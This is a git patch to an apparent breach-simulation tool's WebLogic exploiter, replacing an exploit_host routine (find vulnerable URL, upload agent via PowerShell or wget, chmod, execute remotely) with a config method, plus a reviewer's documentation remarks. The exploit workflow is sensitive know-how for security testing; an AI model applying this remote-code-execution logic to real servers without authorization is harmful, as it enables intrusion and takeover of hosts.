From 8fd42abd5d7e42a2553dcead47948211295a1651 Mon Sep 17 00:00:00 2001
From: Vakaris
Date: Wed, 22 Aug 2018 19:00:14 +0300
Subject: [PATCH] Refactored according to final web_rce framework changes
---
 infection_monkey/exploit/weblogic.py | 40 +++++-----------------------
 1 file changed, 7 insertions(+), 33 deletions(-)
diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py
index c2b6e81a9..4ea80c1d4 100644
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@@ -50,38 +50,12 @@ class WebLogicExploiter(WebRCE):
 'win32': 'monkey-32.exe',
 'win64': 'monkey-64.exe'})
 
- def exploit_host(self):
- # Get open ports
- ports = self.get_ports_w(self.HTTP, ["http"])
- if not ports:
- return False
- # Get urls to try to exploit
- urls = self.build_potential_urls(ports, URLS)
-
- # Checking takes a lot of time, so we check until we get exploitable url and stop
- vulnerable_urls = []
- for url in urls:
- # Get full URL
- if self.test_exploit(url):
- vulnerable_urls.append(url)
- break
- self._exploit_info['vulnerable_urls'] = vulnerable_urls
- if not vulnerable_urls:
- return False
-
- data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
-
- # We can't use 'if not' because response may be ''
- if not data or data['response'] is False:
- return False
-
- if self.change_permissions(vulnerable_urls[0], data['path']) is False:
- return False
-
- if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
- return False
-
- return True
+ def get_exploit_config(self):
+ exploit_config = super(WebLogicExploiter, self).get_exploit_config()
+ exploit_config['blind_exploit'] = True
+ exploit_config['stop_checking_urls'] = True
+ exploit_config['url_extensions'] = URLS
+ return exploit_config
 
 def exploit(self, url, command):
 empty_payload = '''
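Review bot: `get_exploit_config` is added without a docstring or comments, so the meaning of `blind_exploit`, `stop_checking_urls` and `url_extensions` has to be looked up in the WebRCE base class, which this hunk does not show. The removed `exploit_host` carried the rationale ("Checking takes a lot of time, so we check until we get exploitable url and stop"), and that is worth keeping next to the flag, e.g. `# Each URL check is slow, so stop at the first exploitable one` above `exploit_config['stop_checking_urls'] = True`. A one-line docstring such as `"""Return the WebRCE config with the WebLogic-specific overrides."""` would also help. The old method also recorded `self._exploit_info['vulnerable_urls']`, which anyone reading the simulation report may rely on; presumably the base class now does this, but that should be confirmed since it is not visible here.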
@@ -158,7 +132,7 @@ class WebLogicExploiter(WebRCE):
 self._stopped = True
 return
 
- def test_exploit(self, url):
+ def check_if_exploitable(self, url):
 local_port = get_free_tcp_port()
 local_ip = get_interface_to_target(self.host.ip_addr)
 httpd = WebLogicExploiter.HTTPServer(local_ip, local_port)